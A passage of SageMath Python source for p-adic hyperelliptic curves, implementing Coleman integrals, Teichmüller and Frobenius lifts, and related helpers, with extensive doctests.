O(11^2))\n\n\n Note that this fails if the points are not in the same residue disc::\n\n sage: S = C(0,1/4)\n sage: C.tiny_integrals_on_basis(P,S)\n Traceback (most recent call last):\n ...\n ValueError: (11^-2 + O(11^3) : 11^-5 + 8*11^-2 + O(11^0) : 1 + O(11^5)) and (0 : 3 + 8*11 + 2*11^2 + 8*11^3 + 2*11^4 + O(11^5) : 1 + O(11^5)) are not in the same residue disc\n\n \"\"\"\n d = self.hyperelliptic_polynomials()[0].degree()\n g = self.genus()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g + 1\n if P == Q:\n V = VectorSpace(self.base_ring(), dim)\n return V(0)\n R = PolynomialRing(self.base_ring(), ['x', 'y'])\n x, y = R.gens()\n return self.tiny_integrals([x**i for i in range(dim)], P, Q)\n\n def teichmuller(self, P):\n r\"\"\"\n Find a Teichm\\:uller point in the same residue class of `P`.\n\n Because this lift of frobenius acts as `x \\mapsto x^p`,\n take the Teichmuller lift of `x` and then find a matching `y`\n from that.\n\n EXAMPLES::\n\n sage: K = pAdicField(7, 5)\n sage: E = EllipticCurve(K, [-31/3, -2501/108]) # 11a\n sage: P = E(K(14/3), K(11/2))\n sage: E.frobenius(P) == P\n False\n sage: TP = E.teichmuller(P); TP\n (0 : 2 + 3*7 + 3*7^2 + 3*7^4 + O(7^5) : 1 + O(7^5))\n sage: E.frobenius(TP) == TP\n True\n sage: (TP[0] - P[0]).valuation() > 0, (TP[1] - P[1]).valuation() > 0\n (True, True)\n \"\"\"\n K = P[0].parent()\n x = K.teichmuller(P[0])\n pts = self.lift_x(x, all=True)\n if (pts[0][1] - P[1]).valuation() > 0:\n return pts[0]\n else:\n return pts[1]\n\n def coleman_integrals_on_basis(self, P, Q, algorithm=None):\n r\"\"\"\n Computes the Coleman integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n INPUT:\n\n - P point on self\n - Q point on self\n - algorithm (optional) = None (uses Frobenius) or teichmuller (uses Teichmuller points)\n\n OUTPUT:\n\n the Coleman integrals `\\{\\int_P^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n sage: K = pAdicField(11, 5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(2)\n sage: Q = C.lift_x(3)\n sage: C.coleman_integrals_on_basis(P, Q)\n (10*11 + 6*11^3 + 2*11^4 + O(11^5), 11 + 9*11^2 + 7*11^3 + 9*11^4 + O(11^5), 3 + 10*11 + 5*11^2 + 9*11^3 + 4*11^4 + O(11^5), 3 + 11 + 5*11^2 + 4*11^4 + O(11^5))\n sage: C.coleman_integrals_on_basis(P, Q, algorithm='teichmuller')\n (10*11 + 6*11^3 + 2*11^4 + O(11^5), 11 + 9*11^2 + 7*11^3 + 9*11^4 + O(11^5), 3 + 10*11 + 5*11^2 + 9*11^3 + 4*11^4 + O(11^5), 3 + 11 + 5*11^2 + 4*11^4 + O(11^5))\n\n ::\n\n sage: K = pAdicField(11,5)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C.lift_x(11^(-2))\n sage: Q = C.lift_x(3*11^(-2))\n sage: C.coleman_integrals_on_basis(P, Q)\n (3*11^3 + 7*11^4 + 4*11^5 + 7*11^6 + 5*11^7 + O(11^8), 3*11 + 10*11^2 + 8*11^3 + 9*11^4 + 7*11^5 + O(11^6), 4*11^-1 + 2 + 6*11 + 6*11^2 + 7*11^3 + O(11^4), 11^-3 + 6*11^-2 + 2*11^-1 + 2 + O(11^2))\n\n ::\n\n sage: R = C(0,1/4)\n sage: a = C.coleman_integrals_on_basis(P,R) # long time (7s on sage.math, 2011)\n sage: b = C.coleman_integrals_on_basis(R,Q) # long time (9s on sage.math, 2011)\n sage: c = C.coleman_integrals_on_basis(P,Q) # long time\n sage: a+b == c # long time\n True\n\n ::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: S = HK(1,0)\n sage: P = HK(0,3)\n sage: T = HK(0,1,0)\n sage: Q = HK.lift_x(5^-2)\n sage: R = HK.lift_x(4*5^-2)\n sage: HK.coleman_integrals_on_basis(S,P)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 3*5^6 + 4*5^7 + 2*5^8 + O(5^9))\n sage: HK.coleman_integrals_on_basis(T,P)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 3*5^6 + 4*5^7 + 2*5^8 + O(5^9))\n sage: HK.coleman_integrals_on_basis(P,S) == -HK.coleman_integrals_on_basis(S,P)\n True\n sage: HK.coleman_integrals_on_basis(S,Q)\n (4*5 + 4*5^2 + 4*5^3 + O(5^4), 5^-1 + O(5^3))\n sage: HK.coleman_integrals_on_basis(Q,R)\n (4*5 + 2*5^2 + 2*5^3 + 2*5^4 + 5^5 + 5^6 + 5^7 + 3*5^8 + O(5^9), 2*5^-1 + 4 + 4*5 + 4*5^2 + 4*5^3 + 2*5^4 + 3*5^5 + 2*5^6 + O(5^7))\n sage: HK.coleman_integrals_on_basis(S,R) == HK.coleman_integrals_on_basis(S,Q) + HK.coleman_integrals_on_basis(Q,R)\n True\n sage: HK.coleman_integrals_on_basis(T,T)\n (0, 0)\n sage: HK.coleman_integrals_on_basis(S,T)\n (0, 0)\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03): non-Weierstrass points\n - Jennifer Balakrishnan and Robert Bradshaw (2010-02): Weierstrass points\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n from sage.misc.profiler import Profiler\n prof = Profiler()\n prof(\"setup\")\n K = self.base_ring()\n p = K.prime()\n prec = K.precision_cap()\n g = self.genus()\n d = self.hyperelliptic_polynomials()[0].degree()\n if d%2 == 1:\n dim = 2*g\n else:\n dim = 2*g+1\n V = VectorSpace(K, dim)\n #if P or Q is Weierstrass, use the Frobenius algorithm\n if self.is_weierstrass(P):\n if self.is_weierstrass(Q):\n return V(0)\n else:\n PP = None\n QQ = Q\n TP = None\n if Q[1] %p != 0:\n TQ = self.frobenius(Q)\n else:\n T = self.find_char_zero_weier_point(Q)\n return self.coleman_integrals_on_basis(P,T) + self.tiny_integrals_on_basis(T,Q)\n elif self.is_weierstrass(Q):\n PP = P\n QQ = None\n TQ = None\n if P[1] %p != 0:\n TP = self.frobenius(P)\n else:\n T = self.find_char_zero_weier_point(P)\n return self.tiny_integrals_on_basis(P,T) + self.coleman_integrals_on_basis(T,Q)\n elif self.is_same_disc(P,Q):\n return self.tiny_integrals_on_basis(P,Q)\n elif P[1] % p == 0:\n T = self.find_char_zero_weier_point(P)\n return self.tiny_integrals_on_basis(P,T) + self.coleman_integrals_on_basis(T,Q)\n elif Q[1] % p == 0:\n T = self.find_char_zero_weier_point(Q)\n return self.coleman_integrals_on_basis(P,T) + self.tiny_integrals_on_basis(T,Q)\n elif algorithm == 'teichmuller':\n prof(\"teichmuller\")\n PP = TP = self.teichmuller(P)\n QQ = TQ = self.teichmuller(Q)\n else:\n prof(\"frobPQ\")\n TP = self.frobenius(P)\n TQ = self.frobenius(Q)\n PP, QQ = P, Q\n prof(\"tiny integrals\")\n if TP is None:\n P_to_TP = V(0)\n else:\n if TP is not None:\n TPv = (TP[0]**g/TP[1]).valuation()\n xTPv = TP[0].valuation()\n else:\n xTPv = TPv = +Infinity\n if TQ is not None:\n TQv = (TQ[0]**g/TQ[1]).valuation()\n xTQv = TQ[0].valuation()\n else:\n xTQv = TQv = +Infinity\n offset = (2*g-1)*max(TPv, TQv)\n if offset == +Infinity:\n offset = (2*g-1)*min(TPv,TQv)\n if (offset > prec and (xTPv <0 or xTQv <0) and (self.residue_disc(P) == self.change_ring(GF(p))(0,1,0) or self.residue_disc(Q) == self.change_ring(GF(p))(0,1,0))):\n newprec = offset + prec\n K = pAdicField(p,newprec)\n A = PolynomialRing(RationalField(),'x')\n f = A(self.hyperelliptic_polynomials()[0])\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n self = HyperellipticCurve(f).change_ring(K)\n xP = P[0]\n xPv = xP.valuation()\n xPnew = K(sum(c * p**(xPv + i) for i, c in enumerate(xP.expansion())))\n PP = P = self.lift_x(xPnew)\n TP = self.frobenius(P)\n xQ = Q[0]\n xQv = xQ.valuation()\n xQnew = K(sum(c * p**(xQv + i) for i, c in enumerate(xQ.expansion())))\n QQ = Q = self.lift_x(xQnew)\n TQ = self.frobenius(Q)\n V = VectorSpace(K,dim)\n P_to_TP = V(self.tiny_integrals_on_basis(P, TP))\n if TQ is None:\n TQ_to_Q = V(0)\n else:\n TQ_to_Q = V(self.tiny_integrals_on_basis(TQ, Q))\n prof(\"mw calc\")\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n prof(\"eval f\")\n R = forms[0].base_ring()\n try:\n prof(\"eval f %s\" % R)\n if PP is None:\n L = [-ff(R(QQ[0]), R(QQ[1])) for ff in forms] ##changed\n elif QQ is None:\n L = [ff(R(PP[0]), R(PP[1])) for ff in forms]\n else:\n L = [ff(R(PP[0]), R(PP[1])) - ff(R(QQ[0]), R(QQ[1]))\n for ff in forms]\n except ValueError:\n prof(\"changing rings\")\n forms = [ff.change_ring(self.base_ring()) for ff in forms]\n prof(\"eval f %s\" % self.base_ring())\n if PP is None:\n L = [-ff(QQ[0], QQ[1]) for ff in forms] ##changed\n elif QQ is None:\n L = [ff(PP[0], PP[1]) for ff in forms]\n else:\n L = [ff(PP[0], PP[1]) - ff(QQ[0], QQ[1]) for ff in forms]\n b = V(L)\n if PP is None:\n b -= TQ_to_Q\n elif QQ is None:\n b -= P_to_TP\n elif algorithm != 'teichmuller':\n b -= P_to_TP + TQ_to_Q\n prof(\"lin alg\")\n M_sys = matrix(K, M_frob).transpose() - 1\n TP_to_TQ = M_sys**(-1) * b\n prof(\"done\")\n if algorithm == 'teichmuller':\n return P_to_TP + TP_to_TQ + TQ_to_Q\n else:\n return TP_to_TQ\n\n coleman_integrals_on_basis_hyperelliptic = coleman_integrals_on_basis\n\n\n# def invariant_differential(self):\n# \"\"\"\n# Returns the invariant differential `dx/2y` on self\n#\n# EXAMPLES::\n#\n# sage: R. = QQ['x']\n# sage: H = HyperellipticCurve(x^3+1)\n# sage: K = Qp(5,8)\n# sage: HK = H.change_ring(K)\n# sage: w = HK.invariant_differential(); w\n# (((1+O(5^8)))*1) dx/2y\n#\n# ::\n#\n# sage: K = pAdicField(11, 6)\n# sage: x = polygen(K)\n# sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n# sage: C.invariant_differential()\n# (((1+O(11^6)))*1) dx/2y\n#\n# \"\"\"\n# import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n# S = monsky_washnitzer.SpecialHyperellipticQuotientRing(self)\n# MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(S)\n# return MW.invariant_differential()\n\n def coleman_integral(self, w, P, Q, algorithm='None'):\n r\"\"\"\n Return the Coleman integral `\\int_P^Q w`.\n\n INPUT:\n\n - w differential (if one of P,Q is Weierstrass, w must be odd)\n - P point on self\n - Q point on self\n - algorithm (optional) = None (uses Frobenius) or teichmuller (uses Teichmuller points)\n\n OUTPUT:\n\n the Coleman integral `\\int_P^Q w`\n\n EXAMPLES:\n\n Example of Leprevost from Kiran Kedlaya\n The first two should be zero as `(P-Q) = 30(P-Q)` in the Jacobian\n and `dx/2y` and `x dx/2y` are holomorphic. ::\n\n sage: K = pAdicField(11, 6)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C(-1, 1); P1 = C(-1, -1)\n sage: Q = C(0, 1/4); Q1 = C(0, -1/4)\n sage: x, y = C.monsky_washnitzer_gens()\n sage: w = C.invariant_differential()\n sage: w.coleman_integral(P, Q)\n O(11^6)\n sage: C.coleman_integral(x*w, P, Q)\n O(11^6)\n sage: C.coleman_integral(x^2*w, P, Q)\n 7*11 + 6*11^2 + 3*11^3 + 11^4 + 5*11^5 + O(11^6)\n\n ::\n\n sage: p = 71; m = 4\n sage: K = pAdicField(p, m)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C(-1, 1); P1 = C(-1, -1)\n sage: Q = C(0, 1/4); Q1 = C(0, -1/4)\n sage: x, y = C.monsky_washnitzer_gens()\n sage: w = C.invariant_differential()\n sage: w.integrate(P, Q), (x*w).integrate(P, Q)\n (O(71^4), O(71^4))\n sage: R, R1 = C.lift_x(4, all=True)\n sage: w.integrate(P, R)\n 21*71 + 67*71^2 + 27*71^3 + O(71^4)\n sage: w.integrate(P, R) + w.integrate(P1, R1)\n O(71^4)\n\n A simple example, integrating dx::\n\n sage: R. = QQ['x']\n sage: E= HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,10)\n sage: EK = E.change_ring(K)\n sage: P = EK(2, 2)\n sage: Q = EK.teichmuller(P)\n sage: x, y = EK.monsky_washnitzer_gens()\n sage: EK.coleman_integral(x.diff(), P, Q)\n 5 + 2*5^2 + 5^3 + 3*5^4 + 4*5^5 + 2*5^6 + 3*5^7 + 3*5^9 + O(5^10)\n sage: Q[0] - P[0]\n 5 + 2*5^2 + 5^3 + 3*5^4 + 4*5^5 + 2*5^6 + 3*5^7 + 3*5^9 + O(5^10)\n\n Yet another example::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: import sage.schemes.hyperelliptic_curves.monsky_washnitzer as mw\n sage: M_frob, forms = mw.matrix_of_frobenius_hyperelliptic(HK)\n sage: w = HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: f = forms[0]\n sage: S = HK(9,36)\n sage: Q = HK.teichmuller(S)\n sage: P = HK(-1,4)\n sage: b = x*w*w._coeff.parent()(f)\n sage: HK.coleman_integral(b,P,Q)\n 7 + 7^2 + 4*7^3 + 5*7^4 + 3*7^5 + 7^6 + 5*7^7 + 3*7^8 + 4*7^9 + 4*7^10 + O(7^11)\n\n ::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3+1)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: w = HK.invariant_differential()\n sage: P = HK(0,1)\n sage: Q = HK.lift_x(5)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: (2*y*w).coleman_integral(P,Q)\n 5 + O(5^9)\n sage: xloc,yloc,zloc = HK.local_analytic_interpolation(P,Q)\n sage: I2 = (xloc.derivative()/(2*yloc)).integral()\n sage: I2.polynomial()(1) - I2(0)\n 3*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^6 + 5^7 + O(5^9)\n sage: HK.coleman_integral(w,P,Q)\n 3*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^6 + 5^7 + O(5^9)\n\n Integrals involving Weierstrass points::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: S = HK(1,0)\n sage: P = HK(0,3)\n sage: negP = HK(0,-3)\n sage: T = HK(0,1,0)\n sage: w = HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: HK.coleman_integral(w*x^3,S,T)\n 0\n sage: HK.coleman_integral(w*x^3,T,S)\n 0\n sage: HK.coleman_integral(w,S,P)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9)\n sage: HK.coleman_integral(w,T,P)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9)\n sage: HK.coleman_integral(w*x^3,T,P)\n 5^2 + 2*5^3 + 3*5^6 + 3*5^7 + O(5^8)\n sage: HK.coleman_integral(w*x^3,S,P)\n 5^2 + 2*5^3 + 3*5^6 + 3*5^7 + O(5^8)\n sage: HK.coleman_integral(w, P, negP, algorithm='teichmuller')\n 5^2 + 4*5^3 + 2*5^4 + 2*5^5 + 3*5^6 + 2*5^7 + 4*5^8 + O(5^9)\n sage: HK.coleman_integral(w, P, negP)\n 5^2 + 4*5^3 + 2*5^4 + 2*5^5 + 3*5^6 + 2*5^7 + 4*5^8 + O(5^9)\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03)\n - Kiran Kedlaya (2008-05)\n - Jennifer Balakrishnan (2010-02)\n\n \"\"\"\n # TODO: implement Jacobians and show the relationship directly\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n prec = K.precision_cap()\n S = monsky_washnitzer.SpecialHyperellipticQuotientRing(self, K)\n MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(S)\n w = MW(w)\n f, vec = w.reduce_fast()\n basis_values = self.coleman_integrals_on_basis(P, Q, algorithm)\n dim = len(basis_values)\n x,y = self.local_coordinates_at_infinity(2*prec)\n if self.is_weierstrass(P):\n if self.is_weierstrass(Q):\n return 0\n elif f == 0:\n return sum([vec[i] * basis_values[i] for i in range(dim)])\n elif w._coeff(x,-y)*x.derivative()/(-2*y)+w._coeff(x,y)*x.derivative()/(2*y) == 0:\n return self.coleman_integral(w,self(Q[0],-Q[1]), self(Q[0],Q[1]), algorithm)/2\n else:\n raise ValueError(\"The differential is not odd: use coleman_integral_from_weierstrass_via_boundary\")\n\n elif self.is_weierstrass(Q):\n if f == 0:\n return sum([vec[i] * basis_values[i] for i in range(dim)])\n elif w._coeff(x,-y)*x.derivative()/(-2*y)+w._coeff(x,y)*x.derivative()/(2*y) == 0:\n return -self.coleman_integral(w,self(P[0],-P[1]), self(P[0],P[1]), algorithm)/2\n else:\n raise ValueError(\"The differential is not odd: use coleman_integral_from_weierstrass_via_boundary\")\n else:\n return f(Q[0], Q[1]) - f(P[0], P[1]) + sum([vec[i] * basis_values[i] for i in range(dim)]) # this is just a dot product...\n\n def frobenius(self, P=None):\n \"\"\"\n Returns the `p`-th power lift of Frobenius of `P`\n\n EXAMPLES::\n\n sage: K = Qp(11, 5)\n sage: R. = K[]\n sage: E = HyperellipticCurve(x^5 - 21*x - 20)\n sage: P = E.lift_x(2)\n sage: E.frobenius(P)\n (2 + 10*11 + 5*11^2 + 11^3 + O(11^5) : 5 + 9*11 + 2*11^2 + 2*11^3 + O(11^5) : 1 + O(11^5))\n sage: Q = E.teichmuller(P); Q\n (2 + 10*11 + 4*11^2 + 9*11^3 + 11^4 + O(11^5) : 5 + 9*11 + 6*11^2 + 11^3 + 6*11^4 + O(11^5) : 1 + O(11^5))\n sage: E.frobenius(Q)\n (2 + 10*11 + 4*11^2 + 9*11^3 + 11^4 + O(11^5) : 5 + 9*11 + 6*11^2 + 11^3 + 6*11^4 + O(11^5) : 1 + O(11^5))\n\n ::\n\n sage: R. = QQ[]\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: Q = H(0,0)\n sage: u,v = H.local_coord(Q,prec=100)\n sage: K = Qp(11,5)\n sage: L. = K.extension(x^20-11)\n sage: HL = H.change_ring(L)\n sage: S = HL(u(a),v(a))\n sage: HL.frobenius(S)\n (8*a^22 + 10*a^42 + 4*a^44 + 2*a^46 + 9*a^48 + 8*a^50 + a^52 + 7*a^54 +\n 7*a^56 + 5*a^58 + 9*a^62 + 5*a^64 + a^66 + 6*a^68 + a^70 + 6*a^74 +\n 2*a^76 + 2*a^78 + 4*a^82 + 5*a^84 + 2*a^86 + 7*a^88 + a^90 + 6*a^92 +\n a^96 + 5*a^98 + 2*a^102 + 2*a^106 + 6*a^108 + 8*a^110 + 3*a^112 +\n a^114 + 8*a^116 + 10*a^118 + 3*a^120 + O(a^122) :\n a^11 + 7*a^33 + 7*a^35 + 4*a^37 + 6*a^39 + 9*a^41 + 8*a^43 + 8*a^45 +\n a^47 + 7*a^51 + 4*a^53 + 5*a^55 + a^57 + 7*a^59 + 5*a^61 + 9*a^63 +\n 4*a^65 + 10*a^69 + 3*a^71 + 2*a^73 + 9*a^75 + 10*a^77 + 6*a^79 +\n 10*a^81 + 7*a^85 + a^87 + 4*a^89 + 8*a^91 + a^93 + 8*a^95 + 2*a^97 +\n 7*a^99 + a^101 + 3*a^103 + 6*a^105 + 7*a^107 + 4*a^109 + O(a^111) :\n 1 + O(a^100))\n\n AUTHORS:\n\n - Robert Bradshaw and Jennifer Balakrishnan (2010-02)\n \"\"\"\n try:\n _frob = self._frob\n except AttributeError:\n K = self.base_ring()\n p = K.prime()\n x = K['x'].gen(0)\n\n f, f2 = self.hyperelliptic_polynomials()\n if f2 != 0:\n raise NotImplementedError(\"Curve must be in weierstrass normal form.\")\n h = (f(x**p) - f**p)\n\n def _frob(P):\n if P == self(0,1,0):\n return P\n x0 = P[0]\n y0 = P[1]\n try:\n uN = (1 + h(x0)/y0**(2*p)).sqrt()\n yres=y0**p * uN\n xres=x0**p\n if (yres-y0).valuation() == 0:\n yres=-yres\n return self.point([xres,yres, K(1)])\n except (TypeError, NotImplementedError):\n uN2 = 1 + h(x0)/y0**(2*p)\n #yfrob2 = f(x)\n c = uN2.expansion(0)\n v = uN2.valuation()\n a = uN2.parent().gen()\n uN = self.newton_sqrt(uN2,c.sqrt()*a**(v//2),K.precision_cap())\n yres = y0**p *uN\n xres = x0**p\n if (yres - y0).valuation() == 0:\n yres = -yres\n try:\n return self(xres,yres)\n except ValueError:\n return self._curve_over_ram_extn(xres,yres)\n\n self._frob = _frob\n\n if P is None:\n return _frob\n else:\n return _frob(P)\n\n def newton_sqrt(self, f, x0, prec):\n r\"\"\"\n Takes the square root of the power series `f` by Newton's method\n\n NOTE:\n\n this function should eventually be moved to `p`-adic power series ring\n\n INPUT:\n\n - ``f`` -- power series with coefficients in `\\QQ_p` or an extension\n - ``x0`` -- seeds the Newton iteration\n - ``prec`` -- precision\n\n OUTPUT: the square root of `f`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: Q = H(0,0)\n sage: u,v = H.local_coord(Q,prec=100)\n sage: K = Qp(11,5)\n sage: HK = H.change_ring(K)\n sage: L. = K.extension(x^20-11)\n sage: HL = H.change_ring(L)\n sage: S = HL(u(a),v(a))\n sage: f = H.hyperelliptic_polynomials()[0]\n sage: y = HK.newton_sqrt( f(u(a)^11), a^11,5)\n sage: y^2 - f(u(a)^11)\n O(a^122)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n z = x0\n loop_prec = log(RR(prec), 2).ceil()\n for i in range(loop_prec):\n z = (z + f / z) / 2\n return z\n\n def curve_over_ram_extn(self, deg):\n r\"\"\"\n Return ``self`` over `\\QQ_p(p^(1/deg))`.\n\n INPUT:\n\n - deg: the degree of the ramified extension\n\n OUTPUT:\n\n ``self`` over `\\QQ_p(p^(1/deg))`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: K = Qp(11,5)\n sage: HK = H.change_ring(K)\n sage: HL = HK.curve_over_ram_extn(2)\n sage: HL\n Hyperelliptic Curve over 11-adic Eisenstein Extension Field in a defined by x^2 - 11 defined by (1 + O(a^10))*y^2 = (1 + O(a^10))*x^5 + (10 + 8*a^2 + 10*a^4 + 10*a^6 + 10*a^8 + O(a^10))*x^3 + (7 + a^2 + O(a^10))*x^2 + (7 + 3*a^2 + O(a^10))*x\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n K = self.base_ring()\n p = K.prime()\n A = PolynomialRing(QQ,'x')\n x = A.gen()\n J = K.extension(x**deg-p,names='a')\n pol = self.hyperelliptic_polynomials()[0]\n H = HyperellipticCurve(A(pol))\n HJ = H.change_ring(J)\n self._curve_over_ram_extn = HJ\n self._curve_over_ram_extn._curve_over_Qp = self\n return HJ\n\n def get_boundary_point(self, curve_over_extn, P):\n \"\"\"\n Given self over an extension field, find a point in the disc of `P` near the boundary\n\n INPUT:\n\n - curve_over_extn: self over a totally ramified extension\n - P: Weierstrass point\n\n OUTPUT:\n\n a point in the disc of `P` near the boundary\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(3,6)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: J. = K.extension(x^30-3)\n sage: HJ = H.change_ring(J)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: S\n (1 + 2*a^2 + 2*a^6 + 2*a^18 + a^32 + a^34 + a^36 + 2*a^38 + 2*a^40 + a^42 + 2*a^44 + a^48 + 2*a^50 + 2*a^52 + a^54 + a^56 + 2*a^60 + 2*a^62 + a^70 + 2*a^72 + a^76 + 2*a^78 + a^82 + a^88 + a^96 + 2*a^98 + 2*a^102 + a^104 + 2*a^106 + a^108 + 2*a^110 + a^112 + 2*a^116 + a^126 + 2*a^130 + 2*a^132 + a^144 + 2*a^148 + 2*a^150 + a^152 + 2*a^154 + a^162 + a^164 + a^166 + a^168 + a^170 + a^176 + a^178 + O(a^180) : a + O(a^180) : 1 + O(a^180))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n J = curve_over_extn.base_ring()\n a = J.gen()\n prec2 = J.precision_cap()\n x,y = self.local_coord(P,prec2)\n return curve_over_extn(x(a),y(a))\n\n def P_to_S(self, P, S):\n r\"\"\"\n Given a finite Weierstrass point `P` and a point `S`\n in the same disc, computes the Coleman integrals `\\{\\int_P^S x^i dx/2y \\}_{i=0}^{2g-1}`\n\n INPUT:\n\n - P: finite Weierstrass point\n - S: point in disc of P\n\n OUTPUT:\n\n Coleman integrals `\\{\\int_P^S x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,4)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: HJ = HK.curve_over_ram_extn(10)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: HK.P_to_S(P, S)\n (2*a + 4*a^3 + 2*a^11 + 4*a^13 + 2*a^17 + 2*a^19 + a^21 + 4*a^23 + a^25 + 2*a^27 + 2*a^29 + 3*a^31 + 4*a^33 + O(a^35), a^-5 + 2*a + 2*a^3 + a^7 + 3*a^11 + a^13 + 3*a^15 + 3*a^17 + 2*a^19 + 4*a^21 + 4*a^23 + 4*a^25 + 2*a^27 + a^29 + a^31 + O(a^33))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n prec = self.base_ring().precision_cap()\n deg = (S[0]).parent().defining_polynomial().degree()\n prec2= prec*deg\n x,y = self.local_coord(P,prec2)\n g = self.genus()\n integrals = [((x**k*x.derivative()/(2*y)).integral()) for k in range(2*g)]\n val = [I(S[1]) for I in integrals]\n return vector(val)\n\n def coleman_integral_P_to_S(self, w, P, S):\n r\"\"\"\n Given a finite Weierstrass point `P` and a point `S`\n in the same disc, computes the Coleman integral `\\int_P^S w`\n\n INPUT:\n\n - w: differential\n - P: Weierstrass point\n - S: point in the same disc of P (S is defined over an extension of `\\QQ_p`; coordinates\n of S are given in terms of uniformizer `a`)\n\n OUTPUT:\n\n Coleman integral `\\int_P^S w` in terms of `a`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,4)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: J. = K.extension(x^10-5)\n sage: HJ = H.change_ring(J)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: S[0]-P[0] == HK.coleman_integral_P_to_S(x.diff(),P,S)\n True\n sage: HK.coleman_integral_P_to_S(HK.invariant_differential(),P,S) == HK.P_to_S(P,S)[0]\n True\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n prec = self.base_ring().precision_cap()\n deg = S[0].parent().defining_polynomial().degree()\n prec2 = prec * deg\n x,y = self.local_coord(P,prec2)\n int_sing = (w.coeff()(x,y)*x.derivative()/(2*y)).integral()\n int_sing_a = int_sing(S[1])\n return int_sing_a\n\n def S_to_Q(self, S, Q):\n r\"\"\"\n Given `S` a point on self over an extension field, computes the\n Coleman integrals `\\{\\int_S^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n **one should be able to feed `S,Q` into coleman_integral,\n but currently that segfaults**\n\n INPUT:\n\n - S: a point with coordinates in an extension of `\\QQ_p` (with unif. a)\n - Q: a non-Weierstrass point defined over `\\QQ_p`\n\n OUTPUT:\n\n the Coleman integrals `\\{\\int_S^Q x^i dx/2y \\}_{i=0}^{2g-1}` in terms of `a`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: J. = K.extension(x^20-5)\n sage: HJ = H.change_ring(J)\n sage: w = 